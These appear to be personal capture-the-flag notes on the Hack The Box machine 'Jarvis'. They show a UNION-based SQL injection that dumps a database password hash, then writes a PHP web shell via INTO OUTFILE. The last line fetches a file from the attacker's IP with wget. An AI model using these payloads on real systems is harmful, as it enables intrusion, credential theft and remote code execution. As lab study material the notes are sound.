4 :80 sqli

http://jarvis.htb/room.php?cod=1

cod=1'
# page loads, but no room data is shown

# tried ' UNION SELECT with 1-7 columns -- ; nothing worked
# removing the quote and retrying

http://jarvis.htb/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7 -- -
# works: the query executes, but the result shown is the same as for cod=1

# using a cod= value that has no matching row in the db, so the UNION rows are what gets displayed
http://jarvis.htb/room.php?cod=7 UNION SELECT 1,2,3,4,5,6,7 -- -
the returned page contains 2,3,4,5
# those columns are reflected in the page output

version()
10.1.37-MariaDB-0+deb9u1

select user, password from mysql.user limit 0,1
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
# cracked: imissyou
# can login to phpMyAdmin now.


select schema_name from information_schema.schemata limit [0-3],1
hotel
information_schema
mysql
performance_schema

# before proceeding, try to get a shell directly
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,'kashz',4,5,6,7 INTO OUTFILE '/var/www/html/kashz.txt' -- -
# works
http://jarvis.htb/kashz.txt
1	2	kashz	4	5	6	7

jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,"<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>",4,5,6,7 INTO OUTFILE '/var/www/html/k.php' -- -

http://jarvis.htb/k.php?cmd=whoami;id;hostname;uname -a
1 2
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jarvis
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
4 5 6 7 

# can get shell using 
http://jarvis.htb/k.php?cmd=wget 10.10.16.5/web.php
